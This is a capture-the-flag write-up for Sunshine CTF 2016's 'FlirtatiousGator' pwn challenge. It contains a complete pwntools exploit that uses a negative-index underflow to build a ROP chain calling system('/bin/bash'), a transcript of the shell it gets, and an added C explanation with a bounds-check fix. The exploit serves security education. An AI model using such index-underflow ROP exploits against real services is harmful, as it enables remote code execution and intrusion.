300 - FlirtatiousGator

From JaxHax

Challenge

FlirtatiousGator

300

Judges: kablaa

jump on that gator. below file running at

nc 4.31.182.242 9003

flag is in "/home/arr/flag"

Binary Download: Arr.tar.gz


Solution Script

###############################################
#
# Script: pwn-flirtatiousgator.py
#
# Author: Travis Phillips
#
# Date: 03/12/2016
#
# Purpose: To pwn the flirtatiousgator 300 challenge in b-sides
#          Orlando's Sunshine CTF 2016.
#
###############################################
from pwn import *
from binascii import hexlify
 
HOST = "4.31.182.242"
PORT = 9003
 
#context.log_level = "debug"
 
#######################################
# Generic function to handle the index
# value transaction of the program.
#######################################
def sendValues(conn, idx, val):
	conn.recvuntil("enter index\n")
	conn.sendline(str(idx))
	conn.recvuntil("enter value\n")
	conn.sendline(str(val))
 
 
#######################################
# Connect to server.
#######################################
conn = remote(HOST, PORT)
 
#######################################
# It asks for a name; give it something.
#######################################
conn.recvuntil('you?')
conn.sendline("batman")
 
#######################################
# Now the Fun Starts! Using negative
# ints we can underflow the index to 
# point to the end of our stack frame.
# This is relative, so ASLR doesn't matter
# and by using a ROP chain, DEP doesn't
# either!
#######################################
log.info("Rop: Overwriting return Address with scanf@plt")
sendValues(conn, -2147483635, 134513760)
 
log.info("Rop: pop2ret")
sendValues(conn, -2147483634, 134514618)
 
log.info("Rop: '%9s' string pointer")
sendValues(conn, -2147483633, 134514735)
 
log.info("Rop: Pointer to bss writable")
sendValues(conn, -2147483632, 134519724)
 
log.info("Rop: System@plt")
sendValues(conn, -2147483631, 134513712)
 
log.info("Rop: popret")
sendValues(conn, -2147483630, 134513625)
 
log.info("Rop: Pointer to bss writable")
sendValues(conn, -2147483629, 134519724)
 
log.info("Rop: exit(0)")
sendValues(conn, -2147483628, 134514219)
 
#######################################
# You get 10 writes, I only needed 8
# to get a shell. Burn the remaining 2.
#######################################
log.info("burning remaining: 1")
sendValues(conn, 1, 1)
 
log.info("burning remaining: 2")
sendValues(conn, 1, 1)
 
#######################################
# Get the array back from the program
#######################################
conn.recvuntil("0 1 0 0 0 0 0 0 0 0 ")
 
#######################################
# Now the program should be in the 
# scanf("%9s") function of our ROP. send
# it a /bin/bash string to pass to system()
#######################################
conn.sendline("/bin/bash")
 
#######################################
# Give control to the user...
#######################################
log.info("If all went well, you oughta have a shell.")
conn.interactive()
conn.close()


Script in Action

$ python pwn-flirtatiousgator.py 
[+] Opening connection to 4.31.182.242 on port 9003: Done
[*] Rop: Overwriting return Address with scanf@plt
[*] Rop: pop2ret
[*] Rop: '%9s' string pointer
[*] Rop: Pointer to bss writable
[*] Rop: System@plt
[*] Rop: popret
[*] Rop: Pointer to bss writable
[*] Rop: exit(0)
[*] burning remaining: 1
[*] burning remaining: 2
[*] If all went well, you oughta have a shell.
[*] Switching to interactive mode
$ pwd
/
$ cd home
$ ls
arr
$ cd arr
$ ls
arr
flag
$ cat flag
sun{I_feel_only_scales_and_shame}
$ exit
[*] Got EOF while reading in interactive
$ exit
$ exit
[*] Closed connection to 4.31.182.242 port 9003
[*] Got EOF while sending in interactive
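Why the script's first index, -2147483635, lands above the array (on the saved return address, per the script's comments) instead of below it: the C below is an added illustration, not the challenge binary's code and not part of the original writeup. It models the assumed bug, an upper-bound-only check on a signed index, beside the correct check, and computes which 4-byte slot each index really reaches once the byte offset wraps on the 32-bit x86 target that the script's 0x0804xxxx addresses belong to. The array length of 10 (matching the ten values the program prints back) and the exact shape of the weak check are assumptions, since the page does not show the binary's source.

```c
#include <inttypes.h>
#include <stdbool.h>
#include <stdint.h>
#include <stdio.h>

#define ARRAY_LEN 10   /* assumed: the program echoes ten values back */

/* Assumed weak check (the challenge source is not on the page): only the
 * upper bound is tested, and idx is signed, so every negative idx passes. */
bool weak_index_ok(int32_t idx)
{
    return idx < ARRAY_LEN;
}

/* Hardened check: comparing as unsigned folds both bounds into one test,
 * because any negative idx becomes a value far above ARRAY_LEN. */
bool strict_index_ok(int32_t idx)
{
    return (uint32_t)idx < ARRAY_LEN;
}

/* Which 4-byte slot base[idx] really touches on a 32-bit target: the byte
 * offset idx*4 is taken modulo 2^32, and INT32_MIN*4 == 2^33 == 0 (mod 2^32),
 * so INT32_MIN + k lands on slot k even though idx itself is hugely negative.
 * The script's -2147483635 is INT32_MIN + 13, hence slot 13. */
int32_t effective_slot(int32_t idx)
{
    uint32_t byte_offset = (uint32_t)idx * 4u;  /* unsigned wrap is defined */
    return (int32_t)byte_offset / 4;
}

int main(void)
{
    /* Constructed probes: in-bounds, plain positive overflow, plain negative,
     * and the script's first index (INT32_MIN + 13). */
    const int32_t probes[] = { 9, 13, -1, -2147483635 };
    for (size_t i = 0; i < sizeof probes / sizeof probes[0]; i++) {
        printf("idx=%11" PRId32 "  weak=%-6s strict=%-6s reaches slot %" PRId32 "\n",
               probes[i],
               weak_index_ok(probes[i]) ? "pass" : "reject",
               strict_index_ok(probes[i]) ? "pass" : "reject",
               effective_slot(probes[i]));
    }
    return 0;
}
```

The one-comparison unsigned check is the fix a reviewer would ask for: it rejects both the plain negative index and the wrapped one, while the signed upper-bound test accepts every negative value.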